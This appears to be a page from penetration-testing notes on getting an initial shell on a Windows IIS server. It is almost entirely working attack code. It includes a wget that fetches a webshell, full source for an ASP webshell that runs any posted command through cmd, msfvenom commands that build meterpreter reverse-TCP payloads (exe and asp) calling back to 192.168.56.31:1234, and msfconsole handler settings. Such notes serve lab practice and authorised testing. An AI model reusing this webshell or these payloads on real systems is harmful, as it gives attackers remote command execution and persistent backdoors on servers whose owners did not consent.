Initial Shell Shell Shell

wget https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/asp/aspcmd.asp    
        output = "    ?                    this help page\n" +
           "    :sv                  all server variables\n" +
           "    <shell command>      execute any shell command\n";
<%
Function getResult(theParam)
    Dim objSh, objResult
    Set objSh = CreateObject("WScript.Shell")
    Set objResult = objSh.exec(theParam)
    getResult = objResult.StdOut.ReadAll
end Function
%>
<HTML>
    <BODY>
        Enter command:
            <FORM action="" method="POST">
                <input type="text" name="param" size=45 value="<%= myValue %>">
                <input type="submit" value="Run">
            </FORM>
            <p>
        Result :
        <% 
        myValue = request("param")
        thisDir = getResult("cmd /c" & myValue)
        Response.Write(thisDir)
        %>
        </p>
        <br>
    </BODY>
</HTML>

  • The webshell is uploaded in the upload folder.

  • And we have a command execution on the IIS server

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.31 lport=1234 -f exe > shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.31 lport=1234 -f asp > shelldaddy.asp

Although you don’t need to rely on the Metepreter shell’s getprivs command. You can check for the enabled privilege can be checked with the help of the whoami command with the /priv option added to it as shown in the image below. We can see that the session that we gained through exploitation is for the user iisapppool.

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.31
set lport 1234
PreviousMetasploitNextEnumeration 1 - Users, Groups, Computers

Last updated